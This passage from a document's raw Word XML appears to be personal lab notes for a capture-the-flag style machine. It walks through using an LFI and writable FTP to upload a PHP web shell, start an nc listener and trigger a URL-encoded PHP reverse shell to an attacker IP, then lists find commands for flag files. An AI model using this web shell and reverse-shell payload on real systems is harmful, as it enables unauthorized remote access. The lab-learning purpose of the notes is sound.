          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes reverse.exe, which then connects back to you.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open listener first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xyzv6k9kfqu8" w:id="171"/>
      <w:bookmarkEnd w:id="171"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/ftp write permissions leading to reverse shell (putting in reverse shell to ftp)</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId385">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Inclusiveness</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw that we had anonymous login. And so this hinted that maybe we have read permissions for the FTP root directory (usually /var/ftp). To see if we have write permissions, we can use the LFI that we found in the web server previously, and check the FTP config file (specifically the VSFTPD config file).</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After looking at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/vsftpd.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(the VSFTPD config file), we saw that we the FTP root directory was in /var/ftp and that we had write permissions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001437">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2070100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152" name="image160.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image160.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId386"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="207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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means we can upload a PHP reverse shell. But first, let's upload a PHP web shell to test out if this attack vector works. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_REQUEST['cmd']) ?&gt;</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the PHP file in the FTP pub directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 192.168.128.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001440">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">put php-cmd.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001441">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001442">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try if the PHP payload is working. As shown below that I can execute command using the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001443">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1371600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="350" name="image337.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image337.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId387"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="137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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To gain a remote connection first I will generate a listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001446">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -nvlp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001447">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001448">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: the stuff below will not work since you will have to change the reverse shell to your IP and port before you URL encode it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001449">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL Encode the one liner PHP reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute PHP revershell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.128.14/secret_information/?lang=../../../../var/ftp/pub/php-cmd.php&amp;cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001450">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="647700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="166" name="image156.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image156.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId388"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="64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51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the exploit is successfully executed, I will receive a reverse shell connection from port 80 as www-data.</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001457">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u5tst6vkrcah" w:id="172"/>
      <w:bookmarkEnd w:id="172"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find files in Linux</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Files </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">by Name across the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whole system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-name "flag.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name local.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name proof.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name "user.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name "root.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -iname "flag.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001460">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Case insensitive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name "*.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001462">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding ALL .txt files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001463">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursively finding Files of certain type in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">current directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001464">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-type f -name "*.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001465">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">by Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001466">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="962"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / type -d -name "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DirNameHere</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;/dev/null</w:t>
      </w:r>
